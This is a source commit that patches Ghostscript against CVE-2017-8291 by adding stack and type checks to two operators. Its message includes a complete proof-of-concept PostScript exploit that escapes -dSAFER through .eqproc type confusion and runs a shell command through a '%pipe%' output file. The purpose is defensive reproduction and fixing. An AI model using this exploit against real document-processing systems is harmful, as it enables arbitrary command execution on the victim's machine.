gs: apply mitigations against CVE-2017-8291 (thanks jsmoody)

To reproduce: gs -q -dNOPAUSE -dSAFER '-sDEVICE=ppmraw' '-sOutputFile=/dev/null' <<. %!PS-Adobe-3.0 EPSF-3.0 %%BoundingBox: -0 -0 100 100 /size_from 10000 def /size_step 500 def /size_to 65000 def /enlarge 1000 def %/bigarr 65000 array def 0 size_from size_step size_to { pop 1 add } for /buffercount exch def /buffersizes buffercount array def 0 size_from size_step size_to { buffersizes exch 2 index exch put 1 add } for pop /buffers buffercount array def 0 1 buffercount 1 sub { /ind exch def buffersizes ind get /cursize exch def cursize string /curbuf exch def buffers ind curbuf put cursize 16 sub 1 cursize 1 sub { curbuf exch 255 put } for } for /buffersearchvars [0 0 0 0 0] def /sdevice [0] def enlarge array aload { .eqproc buffersearchvars 0 buffersearchvars 0 get 1 add put buffersearchvars 1 0 put buffersearchvars 2 0 put buffercount { buffers buffersearchvars 1 get get buffersizes buffersearchvars 1 get get 16 sub get 254 le { buffersearchvars 2 1 put buffersearchvars 3 buffers buffersearchvars 1 get get put buffersearchvars 4 buffersizes buffersearchvars 1 get get 16 sub put } if buffersearchvars 1 buffersearchvars 1 get 1 add put } repeat buffersearchvars 2 get 1 ge { exit } if %(.) print } loop .eqproc .eqproc .eqproc sdevice 0 currentdevice buffersearchvars 3 get buffersearchvars 4 get 16#7e put buffersearchvars 3 get buffersearchvars 4 get 1 add 16#12 put buffersearchvars 3 get buffersearchvars 4 get 5 add 16#ff put put buffersearchvars 0 get array aload sdevice 0 get 16#3e8 0 put sdevice 0 get 16#3b0 0 put sdevice 0 get 16#3f0 0 put currentdevice null false mark /OutputFile (%pipe%echo gotce) .putdeviceparams 1 true .outputpage .rsdparams %{ } loop 0 0 .quit %asdf .
2019-06-21 18:57:20 +02:00 · 2019-06-21 18:57:20 +02:00 · 0af7d1fe35
parent b767b2ce23
commit 0af7d1fe35
2 changed files with 21 additions and 7 deletions
--- a/sys/src/cmd/gs/src/zfrsd.c
+++ b/sys/src/cmd/gs/src/zfrsd.c
@ -47,13 +47,19 @@ zrsdparams(i_ctx_t *i_ctx_p)
    ref *pFilter;
    ref *pDecodeParms;
    int Intent;
-    bool AsyncRead;
+    bool AsyncRead = false;
    ref empty_array, filter1_array, parms1_array;
    uint i;
-    int code;
+    int code = 0;
+
+    if (ref_stack_count(&o_stack) < 1)
+        return_error(e_stackunderflow);
+    if (!r_has_type(op, t_dictionary) && !r_has_type(op, t_null))
+         return_error(e_typecheck);

    make_empty_array(&empty_array, a_readonly);
-    if (dict_find_string(op, "Filter", &pFilter) > 0) {
+    if (r_has_type(op, t_dictionary)
+        && dict_find_string(op, "Filter", &pFilter) > 0) {
 	if (!r_is_array(pFilter)) {
 	    if (!r_has_type(pFilter, t_name))
 		return_error(e_typecheck);
@ -92,10 +98,12 @@ zrsdparams(i_ctx_t *i_ctx_p)
 		return_error(e_typecheck);
 	}
    }
-    if ((code = dict_int_param(op, "Intent", 0, 3, 0, &Intent)) < 0 ||
-	(code = dict_bool_param(op, "AsyncRead", false, &AsyncRead)) < 0
-	)
-	return code;
+    if (r_has_type(op, t_dictionary))
+        code = dict_int_param(op, "Intent", 0, 3, 0, &Intent);
+
+    if (r_has_type(op, t_dictionary))
+        if ((code = dict_bool_param(op, "AsyncRead", false, &AsyncRead)) < 0)
+            return code;
    push(1);
    op[-1] = *pFilter;
    if (pDecodeParms)
--- a/sys/src/cmd/gs/src/zmisc3.c
+++ b/sys/src/cmd/gs/src/zmisc3.c
@ -55,6 +55,12 @@ zeqproc(i_ctx_t *i_ctx_p)
    ref2_t stack[MAX_DEPTH + 1];
    ref2_t *top = stack;

+    if (ref_stack_count(&o_stack) < 2)
+        return_error(e_stackunderflow);
+    if (!r_is_array(op - 1) || !r_is_array(op)) {
+        return_error(e_typecheck);
+    }
+
    make_array(&stack[0].proc1, 0, 1, op - 1);
    make_array(&stack[0].proc2, 0, 1, op);
    for (;;) {